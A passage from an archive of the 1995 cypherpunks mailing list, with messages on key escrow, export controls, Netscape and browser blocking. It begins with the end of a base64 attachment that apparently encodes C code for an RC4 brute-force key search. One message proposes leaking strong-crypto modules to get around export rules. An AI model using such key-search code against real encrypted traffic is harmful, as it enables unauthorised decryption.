ICAgICAgIHByaW50ZigiXG5UaW1lIHRha2VuID0gJTYuMWYgc2Vjb25kcyIs
IHR6KTsNCgkgICAgICAgcHJpbnRmKCJcblNwZWVkID0gJTYuMWYgdGVzdHMg
cGVyIHNlY29uZC4iLCAoZmxvYXQpKGxvb3BzL3R6KSk7DQogICAgICAgICAg
IHByaW50ZigiXG5vdXQgb2YgYSB0b3RhbCBvZiAlZCBwbGFpbi9jaXBoZXIg
cGFpcnMuXG4iLCBOT19PRl9URVNUUyk7DQogICAgICAgICAgIHJldHVybjsN
CiAgICAgICAgICAgfQ0KICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAg
IH0gICAgICAgIC8vZW5kIGZvciBpDQogICAgIH0gICAgICAgICAgICAgICAv
L2UNCiAgICB9ICAgICAgICAgICAgICAgIC8vZA0KICAgfSAgICAgICAgICAg
ICAgICAgLy9jDQogIH0gICAgICAgICAgICAgICAgICAvL2INCiB9ICAgICAg
ICAgICAgICAgICAgIC8vYQ0KfTsNCi8vICA9PT09PT09PT09PT09DQoNCi8q
IFJDNCBhcyBpbXBsZW1lbnRlZCBmcm9tIGEgcG9zdGluZyBmcm9tDQogKiBO
ZXdzZ3JvdXBzOiBzY2kuY3J5cHQNCiAqIEZyb206IHN0ZXJuZGFya0BuZXRj
b20uY29tIChEYXZpZCBTdGVybmRhcmspDQogKiBTdWJqZWN0OiBSQzQgQWxn
b3JpdGhtIHJldmVhbGVkLg0KICogTWVzc2FnZS1JRDogPHN0ZXJuQ3ZLTDRC
Lkh5eUBuZXRjb20uY29tPg0KICovDQoNCnZvaWQgUkM0X3NldF9rZXkoa2V5
LCBsZW4sIGRhdGEpDQpSQzRfS0VZICprZXk7DQppbnQgbGVuOw0KcmVnaXN0
ZXIgdW5zaWduZWQgY2hhciAqZGF0YTsNCgl7DQogICAgICAgIHJlZ2lzdGVy
IFJDNF9JTlQgdG1wOw0KICAgICAgICByZWdpc3RlciB1bnNpZ25lZCBpbnQg
aWQxLGlkMjsNCiAgICAgICAgcmVnaXN0ZXIgUkM0X0lOVCAqZDsNCiAgICAg
ICAgaW50IGk7DQoNCiAgICAgICAgZD0mKGtleS0+ZGF0YVswXSk7DQoJZm9y
IChpPTA7IGk8MjU2OyBpKyspDQoJCWRbaV09aTsNCg0KICAgICAgICBrZXkt
PnggPSAwOw0KICAgICAgICBrZXktPnkgPSAwOw0KICAgICAgICBpZDE9aWQy
PTA7DQogICAgICAgIGZvciAoaT0wOyBpIDwgMjU2OyBpKyspDQoJCXsNCgkJ
aWQyID0gKGRhdGFbaWQxXSArIGRbaV0gKyBpZDIpICYgMHhmZjsNCgkJdG1w
PWRbaV07IGRbaV09ZFtpZDJdOyBkW2lkMl09dG1wOw0KCQlpZDE9KGlkMSsx
KSVsZW47DQoJCX0NCgl9Ow0KLy8gID09PT09PT09PT09PT0NCnZvaWQgUkM0
KGtleSwgbGVuLCBpbmRhdGEsIG91dGRhdGEpDQpSQzRfS0VZICprZXk7DQp1
bnNpZ25lZCBpbnQgbGVuOw0KdW5zaWduZWQgY2hhciAqaW5kYXRhOw0KdW5z
aWduZWQgY2hhciAqb3V0ZGF0YTsNCgl7DQogICAgICAgIHJlZ2lzdGVyIFJD
NF9JTlQgKmQsdG1wOw0KICAgICAgICByZWdpc3RlciB1bnNpZ25lZCBpbnQg
eCx5Ow0KCXVuc2lnbmVkIGludCBpOw0KDQogICAgICAgIHg9a2V5LT54Ow0K
ICAgICAgICB5PWtleS0+eTsNCg0KICAgICAgICBkPWtleS0+ZGF0YTsNCg0K
ICAgICAgICBmb3IgKGk9MDsgaTxsZW47IGkrKykNCgkJew0KCQl4PSgoeCsx
KSYweGZmKTsNCgkJdG1wPWRbeF07DQoJCXk9KHRtcCt5KSYweGZmOw0KCQlk
W3hdPWRbeV07DQoJCWRbeV09dG1wOw0KCQlvdXRkYXRhW2ldPWluZGF0YVtp
XV5kWyhkW3hdK3RtcCkmMHhmZl07DQoJCX0NCglrZXktPng9eDsNCglrZXkt
Pnk9eTsNCgl9DQovLyAgPT09PT09PT09PT09PQ0KaW50IFJDNF90ZXN0KGtl
eSwgbGVuLCBpbmRhdGEsIG91dGRhdGEpDQpSQzRfS0VZICprZXk7DQp1bnNp
Z25lZCBpbnQgbGVuOw0KdW5zaWduZWQgY2hhciAqaW5kYXRhOw0KdW5zaWdu
ZWQgY2hhciAqb3V0ZGF0YTsNCgl7DQogICAgICAgIHJlZ2lzdGVyIFJDNF9J
TlQgKmQsdG1wOw0KICAgICAgICByZWdpc3RlciB1bnNpZ25lZCBpbnQgeCx5
Ow0KCXVuc2lnbmVkIGludCBpOw0KICAgIGNoYXIgdGVtcDsNCg0KICAgICAg
ICB4PWtleS0+eDsNCiAgICAgICAgeT1rZXktPnk7DQogICAgICAgIGQ9a2V5
LT5kYXRhOw0KICAgICAgICBmb3IgKGk9MDsgaTxsZW47IGkrKykNCgkJew0K
CQl4PSgoeCsxKSYweGZmKTsNCgkJdG1wPWRbeF07DQoJCXk9KHRtcCt5KSYw
eGZmOw0KCQlkW3hdPWRbeV07DQoJCWRbeV09dG1wOw0KLy8JCW91dGRhdGFb
aV09Ow0KICAgICAgICB0ZW1wID0gaW5kYXRhW2ldXmRbKGRbeF0rdG1wKSYw
eGZmXTsNCiAgICAgICAgaWYgKHRlbXAgIT0gb3V0ZGF0YVtpXSkgICAgICAg
ICAgICAvL3NtYWxsIHNwZWVkIHVwIGltcHJvdmVtZW50DQogICAgICAgICBy
ZXR1cm4oMCk7ICAgICAgICAgICAgICAgICAgICAgICAgLy9maXJzdCBieXRl
IG5vdCByaWdodCwgbmV4dCBrZXkNCgkJfQ0KCWtleS0+eD14Ow0KCWtleS0+
eT15Ow0KICAgIHJldHVybigxKTsNCgl9Ow0KLy8gID09PT09PT09PT09PT0N
CnZvaWQgUkM0X3NldF9rZXlfdGVzdChrZXksIGxlbiwgZGF0YSkNClJDNF9L
RVkgKmtleTsNCmludCBsZW47DQpyZWdpc3RlciB1bnNpZ25lZCBjaGFyICpk
YXRhOw0KCXsNCiAgICAgICAgcmVnaXN0ZXIgUkM0X0lOVCB0bXA7DQogICAg
ICAgIHJlZ2lzdGVyIHVuc2lnbmVkIGludCBpZDEsaWQyOw0KICAgICAgICBy
ZWdpc3RlciBSQzRfSU5UICpkOw0KICAgICAgICBpbnQgaTsNCiAgICAgICAg
ZD0mKGtleS0+ZGF0YVswXSk7DQogICAgICAgIG1lbWNweShkLCAma2V5X2J1
ZmYsIHNpemVvZihrZXlfYnVmZikpOyAgLy9zbWFsbCBzcGVlZCBpbXByb3Zl
bWVudA0KDQogICAgICAgIGtleS0+eCA9IDA7DQogICAgICAgIGtleS0+eSA9
IDA7DQogICAgICAgIGlkMT1pZDI9MDsNCiAgICAgICAgZm9yIChpPTA7IGkg
PCAyNTY7IGkrKykNCgkJew0KCQlpZDIgPSAoZGF0YVtpZDFdICsgZFtpXSAr
IGlkMikgJiAweGZmOw0KCQl0bXA9ZFtpXTsgZFtpXT1kW2lkMl07IGRbaWQy
XT10bXA7DQoJCWlkMT0oaWQxKzEpJWxlbjsNCgkJfQ0KCX07DQoNCi8vICA9
PT09PT09PT09PT09AAo=
--Boundary..3936.1071713528.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 11:52:12 PST
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Nutscapify (was Re: Getting a copy of the Jim Clark speech)
In-Reply-To: <199512010343.VAA26254@snoopy.vetmed.auburn.edu>
Message-ID: <9512051952.AA00212@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


It's been around for ages, see 
http://agent2.lycos.com:8001/tools/nutscape/

Frank Stuart writes:
[...]
 > I'm working on an "obnoxify" program to convert normal html documents into
 > documents that look normal to non-netscape browsers, but are too painful to
 > read with netscape
 > (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
 > would be a good time to decide whether or not to distribute it.
regards dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Tue, 5 Dec 95 20:01:51 PST
To: "'cypherpunks@toad.com>
Subject: Secret Clearance (was: re: NIST GAK export meeting, sv)
Message-ID: <01BAC365.EB89CDA0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm definitely opposed to GAK, but the conspiracy theory approach to
considering what it means to employ people with SECRET clearance
may be getting a bit paranoid.

From working at an organization that did a lot of government work,
my understanding of the process of clearing employees is this:

-certain tasks require knowledge or access that must be restricted
-you have to have a high degree of trust in the people doing those tasks
-people with money troubles, out-of-control addictions, skeletons in the
 closet, and histories of "troubles" are prime targets for subversion
-doing a clearance check (in theory) eliminates the possibility that
 these people will be blackmailed/bribed into revealing their secrets

Not that this stuff always works in practice, considering that Aldrich
Ames was an alcoholic with money troubles who then turned up 
with a lavish lifestyle, and no one he worked with noticed until it was
pretty much too late.

The point is, if you want to keep your organization's systems secure,
you need some mechanism to do so. Security clearance is one way;
banks and other financial institutions do other things (like finger prints,
background checks, etc.)

My big question is, do any of the companies providing Internet services,
or Internet software, or digital commerce services/software, employ
any of these security mechanisms on their employees? Comments or
(preferably) references to actual practices?

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 5 Dec 95 20:19:21 PST
To: cypherpunks@toad.com
Subject: Re: No Privacy Right on "My" Desktop ?
In-Reply-To: <Pine.BSD.3.91.951205025944.29416B-100000@ahcbsd1.ovnet.com>
Message-ID: <uq3NFD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"James M. Cobb" <jcobb@ahcbsd1.ovnet.com> writes:
...
> Of course companies may try another tack: Oracle's "internet
> terminal."
>
> As dlv@bwalk.dm.com pointed out in his 11 18 95 post,
>
>  [I guess, they mean no permanent storage or software other
>  than the browser in ROM. No remembered state, no viruses
>  ... -DV]
>
> In "my" terminal.

James, I do hope I haven't given you the impression that I *like* the
proposed $500 "Internet appliance". These gizmos with no local permanent
storage are antithetical to privacy. If you use it just to browse the
Web, then your hotlist, history, et al would be kept at the ISP's. Most
ISP's are greedy scum who wouldn't hesitate to sell this info to
database maintainers. E.g., someone who accesses a Web page dealing with
asthma might later receive unsolicited e-mail from a company selling
asthma medicine, or even be turned down for employment because the
medical insurance rates would jump based on his history of accessing an
asthma-related Web page. Of course, this might happen when a regular PC
is used to run a browser, but the "NC" would provide much more
opportunity for such data collection, and little or no possibility to
enhance the device with encryption / anonymity.

Still, I predict that quite a few people will buy these things when they
become available: those whose disposable income can accomodate a $500
NC, but not a $1000 PC; those unwilling to feed/care for a real PC, and
only interested in browsing the net; whatever (let Oracle's marketing
people identify their potential customers). No one knows if they'll sell
enough to make money for their makers. I heard that currently one can
buy add-ons to the Phillips CD-interactive and to the Nintendo/SGI game
machine to turn them into Web browsers. I presume they sell.

What I said was, someone selling an add-on product for the "NC"
providing some degree of privacy (a PGP ROM on the PCMCIA port??) might
make a quick buck. I'm not entrepreneurial enough to try it myself.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Tue, 5 Dec 95 12:52:23 PST
To: bryce@colorado.edu
Subject: Re: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security"
In-Reply-To: <199512052001.NAA20742@taussky.cs.colorado.edu>
Message-ID: <m0tN4GW-0002e4C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Bryce" == Bryce  <wilcoxb@taussky.cs.colorado.edu> writes:

    Bryce>           To secure Net communications, the government will
    Bryce> need to have access to private data exchanges using what is
    Bryce> known as a key escrow security system, said Clark. He added

Who was the guy who asked why "we" are mad at netscape? Well, I am
because of exactly this blatant lie.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMMSvwEyjTSyISdw9AQErLQP+OjvvewMSjV4FfVxsAE3ILmXoSGHqfn3P
UMn9M2YOluJzejKSOypAGB/LcR0YpukLrLL0QZRxWANRX9WOxaUUtdUVHM4N1YOF
q7o2FdbGRp6gX/7VDsFY63cIUmzNb8fvFLbtQkF12Emz+gmlXiEZvuU9fjpWy0Sn
VkwdkCi/pMU=
=1p7G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Tue, 5 Dec 95 11:46:37 PST
To: cypherpunks@toad.com
Subject: Apache-SSL for export
Message-ID: <Pine.SOL.3.91.951205214241.1372B-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



Are the SSL patches for Apache available somewhere else than in USA or UK?

You know I am a big security risk for those countries as I live in 
Estonia, so it is not allowed for me to get apache-ssl legally. Good old 
COCOM restrictions, the poor guys in Great Britain have not heard the 
world has changed.

So can anyone suggest how to get the software? Ftp, fsp, http, e-mail, 
anything will do.

Juri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 12:51:34 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512052052.VAA02122@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cactus@hks.net (Leslie Todd Masco) wrote:
>In article <199512050326.VAA30525@khijol>, Ed Carp <ecarp@netcom.com>
wrote:
>>That's one of the most politically and socially naive statements I've
>>ever heard.  Corporations *never* do the "right thing" unless it will
>>increase their profits.
>
>I just *love* hearing statments like this from people who have probably
>never started their own businesses.

Perhaps they've worked for a corporation? :-)

>Corporations are no more or less than their component people.  If the
people
>running a corporation care about an issue, the corporation will act upon
>it  -- bounded by the interaction of their survival instinct with their
>assessment of reality.  How could it be otherwise?

Certainly. In many organizations, the people who set policy, and the people
who "run" the corporation are not the same. Often important managers
disagree on issues or on how to achieve them. Individuals within the company
are often focused more on their careers and position within the company,
than on the affect their decisions have outside the company.

To equate an organization, especially a large one, with its constituent
parts ensures that you will be continually surprised by its complex and
unpredictable behavior.

BTW, the crypto relevance of this thread is nil.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMSvq4iUi5SQtQ3tAQF0BAgAwItXRVPLN4f20vAnS7hVj2uAvK7bfqpG
Zp9zVNQoBQfmf+K3KWhdH4a7mg6wAS1MLEyobpcBVyS/W6bBS+3a7TSfQjxRNp7L
RKGeyJG+VO4npX0wZ10OuTbQekjr5MkxfQWYI1MnFvAWsyQA05XeKP2fZBRvWDtm
OGM+1BJtFpNEAPJFDV+o2gHojwVZ870v0zH/9SA2/eTnh5PDqmbb90N7m+ccnRU+
yTSecohxnBeWHslz0FEDw1ZKud9kHCqWWRWIVkBUK7JRxW4o+/yazMfw1d8w+NAI
C/SMP2boacdmv71i3bhgHtm0O4FT0UJKbsstLq7IKg/7E6MuuiFydA==
=7GRj
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 12:52:32 PST
To: Herb Sutter <herbs@interlog.com>
Subject: Re: [NOISE] Barring access to Netscape
In-Reply-To: <199512012041.PAA29577@gold.interlog.com>
Message-ID: <9512052052.AA00507@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Herb Sutter writes:
 > At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote:
 > >If you want to see one way of locking out Netscape users, check out this
 > >URL which points at a Web Page that will not allow access by Netscape Users
[...]
 > JeffW: Please add a configuration option to let users override the "Mozilla"
 > ident, so that they can continue to use Netscape at all sites.  I personally
 > won't use the override, though; if a site is going to insist on trying to
 > frivolously exlude me as a user based on nothing but the browser I choose to
 > use, they aren't serious anyway.
You can use my anonymous proxy which strips off all 'personal'
informations, including User-Agent: ...
While I let Mozillas access it :-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 5 Dec 95 21:59:51 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <199512060554.VAA05768@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



David Lesher <netcomsv.netcom.com!nrk.com!wb8foz> said:

> Attendence was roughly 20% (yes, one fifth) of September.

> ISTM industry is tired of hearing the same words in a different order.


I thought that this would happen, immediately on reading that there was
going to be this meeting.  From Pat and John Young's reports on the previous
meeting, it was almost a revolt; almost everyone in attendence thought that
the proposals were completely wrongheaded.  Yet, it was announced that
this meeting would be happening.  Very quickly an new set of criteria were
announced that made it clear that the input from the last meeting was
completely, systematically, and with no apology whatsoever, ignored.
All the intelligent complaints from intelligent people that cared and thought
a lot about the issue could just have well not have been said.

So, why go to the next meeting?  Many people have apparently decided not to.
Nothing can demoralize somebody more than making good points, telling
arguments, that are then ignored.  I would have thought at this meeting
there would have been a majority of pro-GAK people, to affirm the mandate
that was being presented.  Apparently this did not happen, although I'm
desparately waiting for more reports from this meeting as to exactly what
did happen.

It's not completely true that the efforts of the previous meeting had no
effect, there was one: that the breakout meetings where the major shouting
took place were eliminated from this meeting.  I think that this was an
error on the Govt's part, it worked so well the last time.  I'm sure that
by the next meeting, or the one after that, or if necessary the one after
that, they will have finally come to the point where they can say that
there was unanimous enthusiastic acceptance of the GAK criteria, so why
not extend it to domestic use as well?

thad

who is deeply grateful to the East-Coast group for showing up and making
noise
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 5 Dec 95 18:56:14 PST
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: CFP '96
Message-ID: <Pine.A32.3.91.951205215612.23874A-100000@VIPER.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm going to CFP '96 and was wondering if any cpunks wanted to share a 
hotel room with me(or even better, offer me crash space on the floor).

If so, mail me and we'll work something out.

And now back to your regularly scheduled rants and GAK'ing.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 5 Dec 95 19:15:16 PST
To: sameer@c2.org
Subject: hack microsoft?
Message-ID: <199512060316.WAA10681@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



So, are the folks that broke the Microsoft password stupidity getting
"Hack Microsoft" T shirts?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 5 Dec 95 20:18:13 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <199512060421.WAA06668@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Thanks for the great summary, Pat.

> His concern is not that smart people can have stronger crypto, but that
> strong crypto will be easy and widely used. 

This is why the 4 horsemen arguments aren't very convincing.

We often tend to view things in fairly black and white terms:  either we
have privacy or we don't.  But even with strong crypto, most people won't 
have security because they'll screw it up.  (Anyone who has ever been in 
charge of creating accounts for other people knows what kinds of 
passphrases people will pick.)  And even the most concientous among us 
are still going to be vulnerable to physical attacks on our hardware or 
more exotic attacks like tempest.

The real questions here are (a) how easy will it be to automate
surveillance, and (b) how much is surveillance going to cost, not (c) is
surveillance going to be possible at all?

No matter what happens with the law, determined people will be able to 
protect their privacy fairly well.  And no matter how strong the tools 
are, the government will be very often be able to penetrate the defenses 
by physically tampering with a machine, getting one correspondent to sell 
out another, or whatever.

Without crypto, the price of surveillance is going to drop through the
floor.  It's a lot easier to filter email for suspicious key words than it
is to analyse voice traffic on the telephone.  But with crypto, the price 
of surveillance is going to go way up.  Sticking with the status quo 
isn't an option.

I'd feel a lot better if surveillance became more expensive.  I don't have
much faith in our legal protections against government surveillance. 
Sure, they can't introduce evidence into court if it was obtained with an
illegal wiretap.  But if they learn something interesting, they can trump
up an "anonymous tipster" and get a court order.  Who's watching the
watchdogs to make sure they're following the law?  The exclusionary rule
isn't much comfort if it depends on the police admitting that they
violated my rights.  But how else would I know about an illegal government
wiretap? 

How much surveillance is really taking place?  Who knows.  I do know that
if it becomes 10 or 100 times more expensive than it is now, there will 
probably be a lot less of it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 6 Dec 95 22:28:45 PST
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512070629.WAA07401@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 AM 12/6/95 -0800, Jeff Weinstein wrote:
>  Our representative at the NIST meeting said [GAK is evil] there today.
> It should be up on the web site in a few days when he gets
> back from DC.

Dang, I was just working on my "death to netscape" page before 
I started reading my mail.  I had done the text, and was going
to start stripping background out of the dirty pictures, so that
my server would not drop to its knees.  The text is visible when
viewed in netscape, but the pictures are not.

Should have done the fun part first.

Let us know when the position is put on the web.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: McGrath <st954a65@dunx1.ocs.drexel.edu>
Date: Tue, 5 Dec 95 19:37:21 PST
To: cypherpunks@toad.com
Subject: <no subject>
Message-ID: <30C5105C.408F@post.drexel.edu>
MIME-Version: 1.0
Content-Type: text/plain


is this a mailing list or somthing if it is send it
st954a65@post.drexel.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Tue, 5 Dec 95 03:40:16 PST
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512010549.VAA27874@blob.best.net>
Message-ID: <199512051140.WAA09692@fangorn.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Frank Stuart <fstuart@vetmed.auburn.edu>, loki@obscura.com,
  and         cypherpunks@toad.com
  and "James A. Donald" <jamesd@echeque.com>

J.A.D. wrote:
> At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> > I'm working on an "obnoxify" program to convert 
> > normal html documents into documents that look 
...
> Is there any way one could set up a dirty pictures web
> page in such a fashion that it would be difficult, painful,
> and impractical to get at the pictures through that page
> with a netscape browser?

Well, if you can run CGI scripts, it's very easy: you simply check
the USER_AGENT field, and then send different versions. For an 
example, see

	http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/no-Mozz

You can make the script more or less drastic according to taste.


Can't *anyone* write a simple shell script any more?

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMMQvrCxV6mvvBgf5AQG1SQQA61zpMO33EuyBm9Siapk/Rg3w0KJ50BLK
52zAAn1aYo1YkfTK0uWaRyooaZRYRji7HJR5O9Fs2ss2A6JKaMZ3QFCAKdOI3M6C
aYvPtL+0/45WW++ilAjKSoCKOZhzxP79+9xxLt0dyOf0J6y3DO6gKg9GlH1ZKEpl
6/V79f4ZmeQ=
=4RLq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 13:47:13 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: French crypto restrictions - update ?
In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com>
Message-ID: <9512052148.AA00712@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



Yes Netscape got the authorisation to sell Netscape navigator in
France (40 bits) but there is no policy changes or whatever, it is
still a tedious product by product process to get auth for crypto and
obviously, you'rent going to get an auth for PGP any real soon... :-(


futplex@pseudonym.com writes:
 > Sorry, this has nothing to do with Netscape's position on GAK:
 >
 > Jim Clark writes (via Jeff Weinstein):
 > > Until recently, France did not even
 > > allow us to sell products with 40-bit keys, much less 128-bit keys.
 >
 > I'm curious about this. Were Chirac et compagnie simply dragging their feet
 > on granting a license, have they made an actual policy change, or did they
 > realize they could do what Damien did ? It would be interesting to see more
 > information on this development. (There's a paranoid conspiracy theory I
 > could add to the pile here, but I don't believe it and we seem to be knee-deep
 > in them at the moment....)
 >
 > -Futplex <futplex@pseudonym.com>
 > Let's wait and see
 >


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cryptographic assassination PGP Peking explosion security SDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 13:51:07 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: prototype slot-machine
In-Reply-To: <199512030850.AAA03618@ix3.ix.netcom.com>
Message-ID: <9512052151.AA00725@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



You can play as low as $0.5 on my pseudo slot machine, cyberbucks only
(legal issues). Nice graphics and *feedback* (unlike most shop
software) but sorry, no sound yet :-)

 http://www.box.eu.org/~dl/inc/play.shtml

ps: 1 you can win upto $70
    2 sorry if it sound like an ad, but the Q was to be answered...

Bill Stewart writes:
 > At 10:23 PM 12/2/95 -0800, sameer wrote:
 > >	I've written up a slot-machine thing for ecash, very
 > >experimental, very buggy, not very slick, (i'd like to get the
 > >technical bugs worked out before i put a fancy wrapper on it) and i'd
 > >*like* to announce it here for testing, but I'm worrying about
 > >gambling laws.. 
 > >	any thoughts?
 > Use the demo digicash; it's not real money, and it's never been
 > illegal to play for poker chips.  The mere fact that there's an exchange
 > market for real money vs. digicash play money doesn't change that.  
 > It'd be nice if you take small bets, since many of us only have $100
 > or so of play money; quarters should be fine.
 > To do the job right, you need audio....

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

GIA jihad North Korea FBI Clinton supercomputer Cocaine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Tue, 5 Dec 95 23:03:56 PST
To: cypherpunks@toad.com
Subject: Solution for US/Foreign Software?
Message-ID: <m0tNDk3-000905C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Manufacturers of handheld ham radios have to make them for at least three markets:  Japan, US, and Europe.  Since these devices are usually based on the same LSI chip for control, customization is usually done by installing/not installing certain tiny surface-mount devices (diodes?) on the PC board, which tells the "boss MOS" which frequency band edges to work with, etc.

Getting these radios to receive or transmit "out of band" is usually a simple matter of modiying these radios by adding/removing/moving these diodes to a different position.  The instructions on how to do this custom operation are not included with the radio itself, but the information always seems to get out there, and you can buy books which show the mods for practically every such radio in existence.

Okay, the problem as I see it is that USG doesn't want to approve encryption software for export that can use "excessively long" keys, yet Netscape (and others) want to be able to sell outside the country with full-feature encryption.  I think I have a solution.

1.  Write a program with limited encryption (40 bit?), with the encryption module in a file external to the  main program.
2.  Get export approval for this program.
3.  Write a module which replaces the encryption file, increasing key size to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit PGP, etc.)
4.  Ship that new module with the old software to US customers.  Naturally, that new module will "leak," so anybody who buys the old program out of the country can convert to a fully-functional version by downloading it from a foreign bbs that just happens to have it.  The module can be encrypted/signed by the manufacturer so everyone can be sure of its identity and genuineness.


Better than nothing, I suppose.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 5 Dec 95 23:24:19 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: The "Future" Fallacy
Message-ID: <9512060724.AA13231@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell 

Bill Gates (like Mister Newt before him) committed what I call the Future
Fallacy in "The Road Ahead."  Page 106.

"Soon any child old enough to use a computer will be able to transmit coded
messages that no government on earth will find easy to decipher."
...................................................


Billg is an optimist.

What's wrong with this picture, Duncan?

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
